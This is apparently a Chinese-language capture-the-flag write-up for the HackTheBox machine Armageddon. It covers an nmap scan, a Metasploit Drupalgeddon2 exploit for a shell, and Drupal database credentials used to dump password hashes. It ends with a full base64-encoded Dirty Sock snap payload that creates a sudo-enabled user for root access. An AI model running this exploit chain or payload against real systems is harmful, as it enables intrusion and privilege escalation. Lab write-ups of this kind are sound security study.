HackTheBox-Armageddon

N1Rvana included in HackTheBox

2024-04-16 About 400 words 2 minutes - views

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42


sudo nmap --min-rate 100000 -A -sS   
  
Host is up (0.18s latency).  
Not shown: 998 closed tcp ports (reset)  
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)  
| ssh-hostkey:   
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)  
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)  
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)  
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)  
|_http-title: Welcome to  Armageddon |  Armageddon  
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16  
| http-robots.txt: 36 disallowed entries (15 shown)  
| /includes/ /misc/ /modules/ /profiles/ /scripts/   
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt   
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt   
|_/LICENSE.txt /MAINTAINERS.txt  
|_http-generator: Drupal 7 (http://drupal.org)  
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  
TCP/IP fingerprint:  
OS:SCAN(V=7.94%E=4%D=4/15%OT=22%CT=1%CU=37686%PV=Y%DS=2%DC=T%G=Y%TM=661CA4C  
OS:3%P=x86_64-apple-darwin21.6.0)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=I%TS=A)SE  
OS:Q(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=A)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=I  
OS:%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11  
OS:NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=71  
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4  
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O  
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40  
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q  
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y  
OS:%DFI=N%T=40%CD=S)  
  
Network Distance: 2 hops  
  
TRACEROUTE (using port 1723/tcp)  
HOP RTT       ADDRESS  
1   132.89 ms 10.10.16.1  
2   214.85 ms 10.129.48.89  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 29.92 seconds  

存在22端口和80端口
80端口存在Web服务，并且存在很多文件
其中/CHANGELOG.txt存在版本信息
Drupal 7.56, 2017-06-21
利用msf搜索一下
利用exploit/unix/webapp/drupal_drupalgeddon2这个漏洞
成功获得一个shell
但是权限很低
无法打开任何flag
目标还开放了一个22端口，这里考虑密码复用，连接22端口
通过/etc/passwd得知存在brucetherealadmin用户，在配置文件和数据库中找一下
在sites/default/settings.php中存在数据库账号和密码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


$databases = array (  
  'default' =>   
  array (  
    'default' =>   
    array (  
      'database' => 'drupal',  
      'username' => 'drupaluser',  
      'password' => 'CQHEy@9M*m23gBVj',  
      'host' => 'localhost',  
      'port' => '',  
      'driver' => 'mysql',  
      'prefix' => '',  
    ),  
  ),  
);  

在数据库中找到疑似SSH的密码

1
2
3


mysql -h localhost -u "drupaluser" -pCQHEy@9M*m23gBVj "drupal" -e "select uid,name,pass from users;"  
  
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt  

利用cmd5查出hash值，成功登陆
sudo -l查看详细权限
可以用root权限运行snap命令
参考文章
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
生成命令

1

python2 -c 'print"aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw"+ "A"*4256 + "=="' | base64 -d > exploit.snap

运行sudo /usr/bin/snap install --devmode exploit.snap
切换到dirty_sock用户，密码同样是dirty_sock
sudo cat /root/root.txt